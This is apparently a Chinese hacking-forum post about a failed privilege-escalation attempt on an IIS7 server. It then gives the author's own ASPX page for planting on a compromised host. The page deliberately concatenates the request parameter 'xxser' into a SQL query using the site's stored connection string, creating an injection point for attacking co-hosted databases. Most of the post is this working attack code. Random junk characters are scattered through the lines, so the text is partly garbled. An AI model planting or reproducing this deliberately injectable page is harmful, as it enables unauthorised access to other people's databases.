昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。+ z. d. s6 j+ }* j3 Q8 L4 |
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
7 U" @' q8 k( q代码量不多,自己写个拉倒了。烦死了。4 c5 Q1 Q( o, i3 I. K. T* t
7 F' A |$ F7 j+ e: }8 ?3 g- q% Z
2 q2 h9 d/ M; B' Z6 o* V' D
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
0 {. q! L# Y J/ L( v<html xmlns="http://www.w3.org/1999/xhtml">( l5 d% t9 T3 [1 H& u5 _8 r
<head runat="server">
8 {' ^* W, j% X6 P+ l <title>暗影aspx构造注射专用页面</title>
/ A) r- }! T3 j- s</head>6 ^' ]5 b. [* f+ e% j
<body>
6 t( X) |0 e s% z9 o+ U" l" T5 q <form id="form1" runat="server">
8 Q' t$ ?/ x" Q* O! h8 k* C) n+ o1 [ <div>: O$ E" K* e- o# X
<script language="c#" runat="server">
5 a* q2 ?$ \5 P" {4 _ * t! \4 Z+ k1 ?; }
void page_init(object sender, EventArgs e)
; d: [: n( Q* _5 z) a {/ v% Z# S8 T. k$ d7 H
5 n, H7 l! W) Y
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
- v- }; u) h. X$ f4 x
: l, B) b4 f: ]7 \2 g conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();& q5 R s2 u! Z+ p9 L! q; k/ E
conn.Open();
! {2 i. Z& K4 Y6 p+ E2 l * `# c9 E& \1 G. Z2 d
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1
! w) P3 \) f) o# Z - T6 l& d, L$ [8 L
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
! {% g3 A9 N' s int x = command.ExecuteNonQuery();
# Q$ j7 @+ }& L. ~4 r Response.Write(i+"\n");
, c7 P6 A# ?- W5 Z8 O Response.Write(x);
2 f H% b0 X( o( Q! K/ S8 H1 x conn.Close();, g. Z4 u) M& Z0 F. {" g
}2 m+ i& R$ W, ^0 p2 o6 X& q- u- Z
2 Q& C, d, X9 L
</script>- l, V7 P$ ?- U G0 s N6 H
</div># n; V4 L. k) s( I" G2 k. {
</form>1 x7 Y! D& l7 h+ g% a0 d
</body>( z7 ~' q! h5 [$ o
</html>
& x$ s3 ]" j) b0 o" [" N |